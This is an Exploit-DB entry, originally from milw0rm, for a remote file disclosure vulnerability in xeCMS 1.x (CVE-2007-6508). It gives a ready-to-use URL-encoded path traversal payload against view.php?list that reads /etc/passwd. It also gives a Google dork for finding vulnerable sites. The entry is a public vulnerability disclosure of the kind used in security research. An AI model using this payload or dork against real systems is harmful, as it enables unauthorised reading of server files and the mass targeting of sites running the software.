xeCMS 1.x - view.php list Remote File Disclosure Vulnerability

2007-12-19T00:00:00
ID EDB-ID:4758
Type exploitdb
Reporter p4imi0
Modified 2007-12-19T00:00:00

Description

xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability. CVE-2007-6508. Webapps exploit for php platform

                                        
                                            --------------------------------------------------------------
xeCMS 1.x.x Remote File Disclosure Vulnerability.
--------------------------------------------------------------

download    : http://xecms.sunsite.dk/
author      : p4imi0
contact     : p4imi0@gmail.com
exploit     : view.php?list=..%2F..%2F.. %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
google dork : inurl:"view.php?list=" Powered by xeCMS
thanks to   : str0ke, Cr[]w.

# milw0rm.com [2007-12-19]